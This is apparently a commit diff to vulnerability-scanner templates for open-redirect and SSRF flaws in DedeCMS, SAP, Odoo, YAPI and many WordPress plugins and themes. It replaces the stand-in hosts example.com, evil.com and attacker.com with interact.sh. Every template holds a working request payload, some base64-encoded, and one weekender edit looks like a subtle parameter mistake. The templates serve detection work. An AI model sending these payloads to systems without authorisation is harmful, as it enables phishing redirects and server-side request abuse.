vulnerabilities/other/dedecms-openredirect.yaml
View File

@ -14,13 +14,13 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9ldmlsLmNvbQo="
- "{{BaseURL}}/plus/download.php?open=1&link=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
matchers-condition: and
matchers:
- type: word
words:
- "Location: https://evil.com"
- "Location: https://interact.sh"
part: header
- type: status

4
vulnerabilities/other/homeautomation-v3-openredirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/"
- "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/other/odoo-cms-redirect.yaml
View File

@ -13,10 +13,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/website/lang/en_US?r=https://example.com/"
- "{{BaseURL}}/website/lang/en_US?r=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/other/otobo-open-redirect.yaml
View File

@ -13,10 +13,10 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.example.com'
- '{{BaseURL}}/otobo/index.pl?Action=ExternalURLJump;URL=http://www.interact.sh'
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
vulnerabilities/other/pollbot-redirect.yaml
View File

@ -13,14 +13,14 @@ info:
requests:
- method: GET
path:
- '{{BaseURL}}/%0A/example.com/'
- '{{BaseURL}}/%0A/interact.sh/'
matchers-condition: and
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- type: status
status:

6
vulnerabilities/other/sap-redirect.yaml
View File

@ -11,7 +11,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://example.com"
- "{{BaseURL}}/sap/public/bc/icf/logoff?redirecturl=https://interact.sh"
matchers-condition: and
matchers:
@ -22,7 +22,7 @@ requests:
- type: word
words:
- "Location: https://www.example.com"
- "Location: https://example.com"
- "Location: https://www.interact.sh"
- "Location: https://interact.sh"
condition: or
part: header

4
vulnerabilities/other/thinkific-redirect.yaml
View File

@ -10,7 +10,7 @@ requests:
- method: GET
path:
- "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://evil.com"
- "{{BaseURL}}/api/sso/v2/sso/jwt?error_url=http://interact.sh"
matchers-condition: and
matchers:
@ -19,6 +19,6 @@ requests:
- 302
- type: word
words:
- "<a href=\"http://evil.com?kind=jwt&amp;message=Nil+JSON+web+token\""
- "<a href=\"http://interact.sh?kind=jwt&amp;message=Nil+JSON+web+token\""
condition: or
part: body

2
vulnerabilities/other/yapi-rce.yaml
View File

@ -23,7 +23,7 @@ requests:
Host: {{Hostname}}
Content-Type: application/json;charset=UTF-8
{"email":"{{randstr}}@example.com","password":"{{randstr}}","username":"{{randstr}}"}
{"email":"{{randstr}}@interact.sh","password":"{{randstr}}","username":"{{randstr}}"}
- | # REQUEST 2
GET /api/group/list HTTP/1.1

4
vulnerabilities/wordpress/age-gate-open-redirect.yaml
View File

@ -18,7 +18,7 @@ requests:
path:
- '{{BaseURL}}/wp-admin/admin-post.php'
body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://attacker.com
body: age_gate%5Bd%5D=10&age_gate%5Bm%5D=10&age_gate%5By%5D=1990&age_gate%5Bremember%5D=1&age_gate%5Bage%5D=TVRnPQ%3D%3D&action=age_gate_submit&age_gate%5Bnonce%5D=48f2b89fed&_wp_http_referer=https://interact.sh
headers:
Content-Type: application/x-www-form-urlencoded
@ -26,4 +26,4 @@ requests:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
vulnerabilities/wordpress/attitude-theme-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/"
- "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/wordpress/brandfolder-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://example.com/"
- "{{BaseURL}}/wp-content/plugins/brandfolder/callback.php?wp_abspath=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/wordpress/eatery-restaurant-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://example.com/"
- "{{BaseURL}}/wp-content/themes/eatery/nav.php?-Menu-=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/wordpress/music-store-open-redirect.yaml
View File

@ -15,10 +15,10 @@ requests:
- |
GET /wp-content/plugins/music-store/ms-core/ms-submit.php HTTP/1.1
Host: {{Hostname}}
Referer: https://example.com
Referer: https://interact.sh
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
vulnerabilities/wordpress/newsletter-manager-open-redirect.yaml
View File

@ -15,10 +15,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2F0dGFja2VyLmNvbQ=="
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
vulnerabilities/wordpress/newsletter-open-redirect.yaml
View File

@ -15,12 +15,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cHM6Ly9leGFtcGxlLmNvbQ=="
- "{{BaseURL}}/?wp_nlm=confirmation&appurl=aHR0cDovL2ludGVyYWN0LnNo"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)example\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
# Enhanced by mp on 2022/04/13

4
vulnerabilities/wordpress/ninjaform-open-redirect.yaml
View File

@ -21,7 +21,7 @@ requests:
log={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1
- |
GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://example.com&action=nf_oauth_connect HTTP/1.1
GET /wp-admin/admin-ajax.php?client_id=1&redirect=https://interact.sh&action=nf_oauth_connect HTTP/1.1
Host: {{Hostname}}
req-condition: true
@ -31,5 +31,5 @@ requests:
dsl:
- 'status_code_1 == 302'
- 'status_code_2 == 302'
- "contains(all_headers_2, 'Location: https://example.com?client_id=1')"
- "contains(all_headers_2, 'Location: https://interact.sh?client_id=1')"
condition: and

4
vulnerabilities/wordpress/pieregister-open-redirect.yaml
View File

@ -15,12 +15,12 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://example.com"
- "{{BaseURL}}/?piereg_logout_url=true&redirect_to=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
# Enhanced by mp on 2022/04/13

4
vulnerabilities/wordpress/ultimatemember-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/register/?redirect_to=https://example.com/"
- "{{BaseURL}}/register/?redirect_to=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/wordpress/weekender-newspaper-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/weekender/friend.php?id=MTA0&link=aHR0cHM6Ly9leGFtcGxlLmNvbQ=="
- "{{BaseURL}}/wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA=="
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/wordpress/wp-grimag-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://example.com"
- "{{BaseURL}}/wp-content/themes/Grimag/go.php?https://interact.sh"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

8
vulnerabilities/wordpress/wp-multiple-theme-ssrf.yaml
View File

@ -16,15 +16,15 @@ requests:
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://example.com
action=epsilon_framework_ajax_action&args%5Baction%5D%5B%5D=Requests&args%5Baction%5D%5B%5D=request_multiple&args%5Bargs%5D%5B0%5D%5Burl%5D=http://interact.sh
matchers-condition: and
matchers:
- type: word
words:
- "Example Domain"
- "protocol_version"
part: body
words:
- "Interactsh Server"
- "protocol_version"
- type: status
status:

4
vulnerabilities/wordpress/wp-prostore-open-redirect.yaml
View File

@ -12,10 +12,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/themes/prostore/go.php?https://example.com/"
- "{{BaseURL}}/wp-content/themes/prostore/go.php?https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header

4
vulnerabilities/wordpress/wp-security-open-redirect.yaml
View File

@ -15,10 +15,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://attacker.com"
- "{{BaseURL}}/?aiowpsec_do_log_out=1&after_logout=https://interact.sh"
matchers:
- type: regex
part: header
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)attacker\.com\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1
- '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/ZDYhFh/1

4
vulnerabilities/wordpress/wptouch-open-redirect.yaml
View File

@ -19,10 +19,10 @@ info:
requests:
- method: GET
path:
- "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://example.com/"
- "{{BaseURL}}/?wptouch_switch=desktop&redirect=https://interact.sh/"
matchers:
- type: regex
regex:
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$'
part: header